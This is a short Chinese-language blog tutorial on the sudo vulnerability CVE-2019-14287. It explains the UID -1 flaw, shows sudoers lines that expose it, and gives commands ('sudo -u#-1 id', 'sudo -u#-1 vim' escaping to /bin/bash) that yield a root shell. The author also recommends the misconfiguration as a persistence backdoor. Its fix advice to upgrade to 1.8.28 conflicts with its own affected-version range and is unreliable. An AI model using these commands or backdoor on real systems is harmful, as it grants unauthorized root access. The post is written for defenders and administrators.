注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
[TOC]
CVE-2019-14287 | sudo bug
描述:研究人员在Linux SUDO命令中发现了一个bug,非授权的用户可以利用该bug以root权限运行命令。所以可以利用此漏洞来进行低权限用户的权限提升,亦可以用来进行持续维权;幸好该漏洞不是以标准配置下运行,因此大多数Linux服务器不受影响(所以我才说作后门最合适)。 影响版本: x <= v1.8.28 漏洞利用:在Linux操作系统下执行命令时,非特权的用户可以用sudo命令来以root权限来运行命令,前提是要知道root用户密码或提前被授予权限。 漏洞原理:通过在sudo命令中将UID 设为-1或4294967295来以root权限运行sudo命令,实际这时的Id=0又因为Linux上root的默认uid就是0所以得到root权限
漏洞复现: 1.可以通过在/etc/sudoers配置文件中加入特殊命令来配置Sudo命令为允许用户以其他用户运行命令
代码语言:javascript复制#比如下面的命令就可以让用户test以其他非root用户来运行/usr/bin/vim和 /usr/bin/id命令。
test ALL = (ALL, !root) /usr/bin/vim
test ALL = (ALL, !root) /usr/bin/id
#比如,下面的命令就用test用户的UID来替代用户名了:
sudo -u#1002 vim
#用sudo -u来指定要运行的用户
比如,下面的命令就利用该漏洞来以root权限启动 /usr/bin/id ,但是test用户的 /etc/sudoers文件中是没有这样的权限的。
sudo -u#-1 id
#实际利用
sudo -u#-1 vim
:!/bin/bash #进入Shell界面
WeiyiGeek.
漏洞修复:建议用户尽快升级到1.8.28版本